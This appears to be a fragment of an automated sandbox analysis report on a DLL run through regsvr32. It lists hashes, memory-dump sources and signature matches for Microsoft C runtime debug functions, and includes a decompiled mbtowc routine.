                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_argwctomb_s
                                                  • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 2560055391-3497434347
                                                  • Opcode ID: f7e31fddf96ab2d989b429fa4fac32de28ca989592260db18f40bb78f450a6ea
                                                  • Instruction ID: 46d09667909aa5f7b215aa93bab53907018271778d835aa8b5e6ab3fef1b3364
                                                  • Opcode Fuzzy Hash: f7e31fddf96ab2d989b429fa4fac32de28ca989592260db18f40bb78f450a6ea
                                                  • Instruction Fuzzy Hash: 3BC12D72A0C7C686E7B19B64E8457BEB7E4F384785F604025DAC887AA9DB7DE540CF00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: __doserrno$_invalid_parameter
                                                  • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_lseeki64$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                                  • API String ID: 747159061-1442092225
                                                  • Opcode ID: ef8329fd12da17d600f4f9f1cced5d5e2c2be82d60747835616dff46824e4e92
                                                  • Instruction ID: caaad020489782614700f882d8602b34381ead5b625f1b09b5848be00580b1cf
                                                  • Opcode Fuzzy Hash: ef8329fd12da17d600f4f9f1cced5d5e2c2be82d60747835616dff46824e4e92
                                                  • Instruction Fuzzy Hash: 28617C72A1C646CAE7909B25EC4076E72E1F380765F604725E6ED47AF9DB7EE440CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _exit_invoke_watson_if_error_invoke_watson_if_oneof
                                                  • String ID: Module: $(*_errno())$...$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
                                                  • API String ID: 1778837556-2487400587
                                                  • Opcode ID: 577a98effe66048d1b02d2ce2304ffee9433b0bc14e646f7048145a1ac209acc
                                                  • Instruction ID: 47630d5eafba837dbe703c3de9865bf662ca48ff4c989782bbe983e1f30135bf
                                                  • Opcode Fuzzy Hash: 577a98effe66048d1b02d2ce2304ffee9433b0bc14e646f7048145a1ac209acc
                                                  • Instruction Fuzzy Hash: 7851C476608AC591E774DB18F8803EEB3E1F788394F604126EACD43AA9DB7ED154CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameterwctomb_s
                                                  • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 83251219-3442986447
                                                  • Opcode ID: 001a85c562113ca4b869716a344f10cda0261345211a969ed6127680fca34cae
                                                  • Instruction ID: db55a7b1c5e8f8ba017cd25dadef4e5d7f369c86b420bd695ab78b9edef6402a
                                                  • Opcode Fuzzy Hash: 001a85c562113ca4b869716a344f10cda0261345211a969ed6127680fca34cae
                                                  • Instruction Fuzzy Hash: 49F1D87260CBC186E7B18B25E8947AEB7E4F384785F604125EACD87AA9DB7DD540CF00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(filedes) & FOPEN)$(filedes >= 0 && (unsigned)filedes < (unsigned)_nhandle)$_commit$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\commit.c
                                                  • API String ID: 2123368286-2816485415
                                                  • Opcode ID: a9ecfc86665cfe11dfc030c63538da66c5eec56c542ce672bdc8af4c2c9759d0
                                                  • Instruction ID: e049fe60bfe8b909c44bc6b291fed8ca56badbc40bca4273ec712473172458ea
                                                  • Opcode Fuzzy Hash: a9ecfc86665cfe11dfc030c63538da66c5eec56c542ce672bdc8af4c2c9759d0
                                                  • Instruction Fuzzy Hash: 72617B71A1C6468AE7909B28EC4176E73E1F780354F608225E6DE57AF5D77EE440CF02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: __doserrno$_invalid_parameter
                                                  • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_close$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\close.c
                                                  • API String ID: 747159061-2992490823
                                                  • Opcode ID: 145745de55703435efe457d343042b6d2b79a4b89ecca71574c94757b3ea27c1
                                                  • Instruction ID: a54d4eac887ae6c515e29e2b1085f50a353430ba1ba5378d93a4f051e541eccc
                                                  • Opcode Fuzzy Hash: 145745de55703435efe457d343042b6d2b79a4b89ecca71574c94757b3ea27c1
                                                  • Instruction Fuzzy Hash: 38515C71A186468AE7909B29EC8176E73E2F780758F608225E6DD476F5D77EE400CF02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_arg
                                                  • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 1328470723-1899493600
                                                  • Opcode ID: f6969a0051e08e9fb172d17dbb699df528c09bf6843d3bd9f9f4304ac6550dc4
                                                  • Instruction ID: 35246ecaaba514364cbfc4328619620b6524a9f29049ac5612c0b139108759f7
                                                  • Opcode Fuzzy Hash: f6969a0051e08e9fb172d17dbb699df528c09bf6843d3bd9f9f4304ac6550dc4
                                                  • Instruction Fuzzy Hash: 41C10D72A0CAC286E7B19B55E8407AFB7E0F384346F600125E6C987AE9DB7DE444CF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocaMarkStringmalloc
                                                  • String ID:
                                                  • API String ID: 2352934578-0
                                                  • Opcode ID: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                                  • Instruction ID: 07e98e5d3e74dc1edba9ed484819fff5a1f4d1c282268086727bfc73f0da1f11
                                                  • Opcode Fuzzy Hash: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                                  • Instruction Fuzzy Hash: E8B1D73690C7818AE7A0CB5AE84476FB7E0F789754F214525EAC983BA8DB7ED444CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcsncpy_s.inl$wcsncpy_s
                                                  • API String ID: 2123368286-322314505
                                                  • Opcode ID: 3bb9d1a90c7c3446087a29b367bd8117c888f0c96a3fbe465b5df790d7333f4b
                                                  • Instruction ID: 6d338823bc0f2b3e781b71aef6a49b7720da2244df946e2498ce1ac2f83d5b49
                                                  • Opcode Fuzzy Hash: 3bb9d1a90c7c3446087a29b367bd8117c888f0c96a3fbe465b5df790d7333f4b
                                                  • Instruction Fuzzy Hash: BE023F32A0CB8585EBF09B29E94476EA3E0F385795F604625D6DD83BE5DF3ED0848B01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameter
                                                  • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 1139040907-3988320827
                                                  • Opcode ID: 4175f3561072ab378176a1e1f92056bf5caba3e85f41217d234b1a14ff64e00d
                                                  • Instruction ID: 3e7729e9fa2df8fbd66d26b0c41d9f273e3b14a95de5485bb8cc9613adf332ea
                                                  • Opcode Fuzzy Hash: 4175f3561072ab378176a1e1f92056bf5caba3e85f41217d234b1a14ff64e00d
                                                  • Instruction Fuzzy Hash: 48F1E972A0CAC18AE7A08B55E8407AFB7E0F385746F600126E6CD87AA9DB7DD444CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$wcscpy_s
                                                  • API String ID: 2123368286-3300880850
                                                  • Opcode ID: 938211b99713ed548de0de10d16fbf2c247e5ceda09f99a66501889bb82a488d
                                                  • Instruction ID: aecfb8002ddf48ca923cbb39b51a8433fc62f52c2bad17b92f015e95501d1b82
                                                  • Opcode Fuzzy Hash: 938211b99713ed548de0de10d16fbf2c247e5ceda09f99a66501889bb82a488d
                                                  • Instruction Fuzzy Hash: 16C15B31A0DB8685EBB08B29E84476E63E4F385795F608235D6DD43BA9DF7ED084CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$strcpy_s
                                                  • API String ID: 2123368286-3045918802
                                                  • Opcode ID: ee01400f27967885302bbfc3418a092fc70a607ac75d61aa13826b291406155b
                                                  • Instruction ID: 2d2c21a115c33e05293010ad7c3501076a31da08f4abba68164bfd8b1e70ad26
                                                  • Opcode Fuzzy Hash: ee01400f27967885302bbfc3418a092fc70a607ac75d61aa13826b291406155b
                                                  • Instruction Fuzzy Hash: 9EC14D3190CB8A85EBA08B28E84436EA3E0F386794F614535D6DE43BB5DF7ED448CB11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 15%
                                                  			E000007FE7FEF9D3F000(long long __rcx, signed char* __rdx, long long __r8, long long __r9, long long _a8, signed char* _a16, long long _a24, long long _a32) {
                                                  				intOrPtr _v24;
                                                  				long long _v32;
                                                  				intOrPtr _v36;
                                                  				intOrPtr _v40;
                                                  				intOrPtr _v44;
                                                  				intOrPtr _v48;
                                                  				intOrPtr _v52;
                                                  				intOrPtr _v56;
                                                  				char _v88;
                                                  				intOrPtr _v96;
                                                  				long long _v104;
                                                  				void* _t80;
                                                  				void* _t81;
                                                  				void* _t89;
                                                  				void* _t92;
                                                  				intOrPtr _t102;
                                                  				intOrPtr* _t136;
                                                  				intOrPtr* _t137;
                                                  				intOrPtr* _t139;
                                                  				signed char* _t141;
                                                  				intOrPtr* _t142;
                                                  				intOrPtr* _t143;
                                                  				intOrPtr* _t144;
                                                  				intOrPtr* _t148;
                                                  				intOrPtr* _t149;
                                                  
                                                  				_a32 = __r9;
                                                  				_a24 = __r8;
                                                  				_a16 = __rdx;
                                                  				_a8 = __rcx;
                                                  				if (_a16 == 0) goto 0xf9d3f031;
                                                  				if (_a24 != 0) goto 0xf9d3f038;
                                                  				goto 0xf9d3f31a;
                                                  				_t136 = _a16;
                                                  				if ( *_t136 != 0) goto 0xf9d3f066;
                                                  				if (_a8 == 0) goto 0xf9d3f05f;
                                                  				 *_a8 = 0;
                                                  				goto 0xf9d3f31a;
                                                  				0xf9d266b0();
                                                  				_t80 = E000007FE7FEF9D26840(0,  &_v88);
                                                  				_t137 =  *_t136;
                                                  				if ( *((intOrPtr*)(_t137 + 0x10c)) == 1) goto 0xf9d3f0d2;
                                                  				_t81 = E000007FE7FEF9D26840(_t80,  &_v88);
                                                  				if ( *((intOrPtr*)( *_t137 + 0x10c)) == 2) goto 0xf9d3f0d2;
                                                  				_t139 = L"_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2";
                                                  				_v104 = _t139;
                                                  				r9d = 0;
                                                  				r8d = 0x47;
                                                  				0xf9d2b3b0();
                                                  				if (_t81 != 1) goto 0xf9d3f0d2;
                                                  				asm("int3");
                                                  				E000007FE7FEF9D26840(0,  &_v88);
                                                  				if ( *((intOrPtr*)( *_t139 + 0x14)) != 0) goto 0xf9d3f121;
                                                  				if (_a8 == 0) goto 0xf9d3f106;
                                                  				_t141 = _a16;
                                                  				 *_a8 =  *_t141 & 0x000000ff;
                                                  				_v56 = 1;
                                                  				E000007FE7FEF9D26800( &_v88);
                                                  				goto 0xf9d3f31a;
                                                  				E000007FE7FEF9D26840(_v56,  &_v88);
                                                  				if (E000007FE7FEF9D32B90( *_a16 & 0x000000ff, _t141, _t141) == 0) goto 0xf9d3f276;
                                                  				_t89 = E000007FE7FEF9D26840(_t88,  &_v88);
                                                  				_t142 =  *_t141;
                                                  				if ( *((intOrPtr*)(_t142 + 0x10c)) - 1 <= 0) goto 0xf9d3f1f3;
                                                  				E000007FE7FEF9D26840(_t89,  &_v88);
                                                  				_t143 =  *_t142;
                                                  				if (_a24 -  *((intOrPtr*)(_t143 + 0x10c)) < 0) goto 0xf9d3f1f3;
                                                  				if (_a8 == 0) goto 0xf9d3f191;
                                                  				_v36 = 1;
                                                  				goto 0xf9d3f199;
                                                  				_v36 = 0;
                                                  				_t92 = E000007FE7FEF9D26840( *((intOrPtr*)(_t143 + 0x10c)),  &_v88);
                                                  				_t144 =  *_t143;
                                                  				_v32 = _t144;
                                                  				E000007FE7FEF9D26840(_t92,  &_v88);
                                                  				_v96 = _v36;
                                                  				_v104 = _a8;
                                                  				r9d =  *((intOrPtr*)(_v32 + 0x10c));
                                                  				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0xf9d3f247;
                                                  				E000007FE7FEF9D26840(_t94,  &_v88);
                                                  				if (_a24 -  *((intOrPtr*)( *((intOrPtr*)( *_t144)) + 0x10c)) < 0) goto 0xf9d3f221;
                                                  				_t148 = _a16;
                                                  				if ( *((char*)(_t148 + 1)) != 0) goto 0xf9d3f247;
                                                  				0xf9d2ab30();
                                                  				 *_t148 = 0x2a;
                                                  				_v52 = 0xffffffff;
                                                  				E000007FE7FEF9D26800( &_v88);
                                                  				goto 0xf9d3f31a;
                                                  				E000007FE7FEF9D26840(_v52,  &_v88);
                                                  				_t149 =  *_t148;
                                                  				_v48 =  *((intOrPtr*)(_t149 + 0x10c));
                                                  				E000007FE7FEF9D26800( &_v88);
                                                  				_t102 = _v48;
                                                  				goto 0xf9d3f310;
                                                  				if (_a8 == 0) goto 0xf9d3f28b;
                                                  				_v24 = 1;
                                                  				goto 0xf9d3f293;
                                                  				_v24 = 0;
                                                  				E000007FE7FEF9D26840(_t102,  &_v88);
                                                  				_v96 = _v24;
                                                  				_v104 = _a8;
                                                  				r9d = 1;
                                                  				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0xf9d3f2f8;
                                                  				0xf9d2ab30();
                                                  				 *((intOrPtr*)( *_t149)) = 0x2a;
                                                  				_v44 = 0xffffffff;
                                                  				E000007FE7FEF9D26800( &_v88);
                                                  				goto 0xf9d3f31a;
                                                  				_v40 = 1;
                                                  				E000007FE7FEF9D26800( &_v88);
                                                  				goto 0xf9d3f31a;
                                                  				return E000007FE7FEF9D26800( &_v88);
                                                  			}




























                                                  0x7fef9d3f000
                                                  0x7fef9d3f005
                                                  0x7fef9d3f00a
                                                  0x7fef9d3f00f
                                                  0x7fef9d3f024
                                                  0x7fef9d3f02f
                                                  0x7fef9d3f033
                                                  0x7fef9d3f038
                                                  0x7fef9d3f045
                                                  0x7fef9d3f050
                                                  0x7fef9d3f05c
                                                  0x7fef9d3f061
                                                  0x7fef9d3f073
                                                  0x7fef9d3f07d
                                                  0x7fef9d3f082
                                                  0x7fef9d3f08c
                                                  0x7fef9d3f093
                                                  0x7fef9d3f0a2
                                                  0x7fef9d3f0a4
                                                  0x7fef9d3f0ab
                                                  0x7fef9d3f0b0
                                                  0x7fef9d3f0b3
                                                  0x7fef9d3f0c5
                                                  0x7fef9d3f0cd
                                                  0x7fef9d3f0cf
                                                  0x7fef9d3f0d7
                                                  0x7fef9d3f0e3
                                                  0x7fef9d3f0ee
                                                  0x7fef9d3f0f0
                                                  0x7fef9d3f103
                                                  0x7fef9d3f106
                                                  0x7fef9d3f113
                                                  0x7fef9d3f11c
                                                  0x7fef9d3f126
                                                  0x7fef9d3f140
                                                  0x7fef9d3f14b
                                                  0x7fef9d3f150
                                                  0x7fef9d3f15a
                                                  0x7fef9d3f165
                                                  0x7fef9d3f16a
                                                  0x7fef9d3f17a
                                                  0x7fef9d3f185
                                                  0x7fef9d3f187
                                                  0x7fef9d3f18f
                                                  0x7fef9d3f191
                                                  0x7fef9d3f19e
                                                  0x7fef9d3f1a3
                                                  0x7fef9d3f1a6
                                                  0x7fef9d3f1b0
                                                  0x7fef9d3f1bc
                                                  0x7fef9d3f1c8
                                                  0x7fef9d3f1d2
                                                  0x7fef9d3f1f1
                                                  0x7fef9d3f1f8
                                                  0x7fef9d3f20f
                                                  0x7fef9d3f211
                                                  0x7fef9d3f21f
                                                  0x7fef9d3f221
                                                  0x7fef9d3f226
                                                  0x7fef9d3f22c
                                                  0x7fef9d3f239
                                                  0x7fef9d3f242
                                                  0x7fef9d3f24c
                                                  0x7fef9d3f251
                                                  0x7fef9d3f25a
                                                  0x7fef9d3f263
                                                  0x7fef9d3f268
                                                  0x7fef9d3f271
                                                  0x7fef9d3f27f
                                                  0x7fef9d3f281
                                                  0x7fef9d3f289
                                                  0x7fef9d3f28b
                                                  0x7fef9d3f298
                                                  0x7fef9d3f2a4
                                                  0x7fef9d3f2b0
                                                  0x7fef9d3f2b5
                                                  0x7fef9d3f2d3
                                                  0x7fef9d3f2d5
                                                  0x7fef9d3f2da
                                                  0x7fef9d3f2e0
                                                  0x7fef9d3f2ed
                                                  0x7fef9d3f2f6
                                                  0x7fef9d3f2f8
                                                  0x7fef9d3f305
                                                  0x7fef9d3f30e
                                                  0x7fef9d3f321

                                                  APIs
                                                  Strings
                                                  • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c, xrefs: 000007FEF9D3F0B9
                                                  • _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2, xrefs: 000007FEF9D3F0A4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWide
                                                  • String ID: _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c
                                                  • API String ID: 3162172745-1617866167
                                                  • Opcode ID: 1f8ba6bd668c859fdc1c929c81f91c7de023d0dcacf149bd6155c41000b32a69
                                                  • Instruction ID: 684ba7971de88d1067c150b2dc8aa1ec623b130c6e00156a0851ae80eca3a1f6
                                                  • Opcode Fuzzy Hash: 1f8ba6bd668c859fdc1c929c81f91c7de023d0dcacf149bd6155c41000b32a69
                                                  • Instruction Fuzzy Hash: A9913C32A1C78586E7A0DB19E8507AEB7E0F785B45FA08136E6CD837A5DB3ED444CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
